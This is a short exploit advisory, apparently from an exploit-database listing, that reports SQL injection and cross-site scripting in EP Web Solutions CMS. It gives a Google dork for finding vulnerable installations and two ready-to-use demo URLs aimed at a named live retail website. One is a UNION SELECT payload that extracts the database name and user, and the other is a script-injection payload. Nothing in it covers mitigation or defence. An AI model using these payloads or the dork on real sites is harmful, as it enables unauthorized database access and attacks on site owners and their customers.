#Exploit Title: EP Web Solutions CMS – SQL Injection and XSS Vulnerability
#Date: 2020-09-28
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: evergreenparkweb.com
#Google Dork: intext:"EPweb " or " Evergreen Park Web"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: evergreenparkweb.com
SQL Injection
Demo: https://www.martinellischildrenswear.com/product_details.php?ID=-890%27%20UNION%20SELECT%201,database()%20,user(),4,5,6,7,8,9,10,11,12,13,14--%20-
################################################################################
Cross Site Scripting (XSS)
Demo:https://www.martinellischildrenswear.com/shop.php?search=%22/%3E%3Cscript%3Ealert`PywebSecurity`%3C/script%3E
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************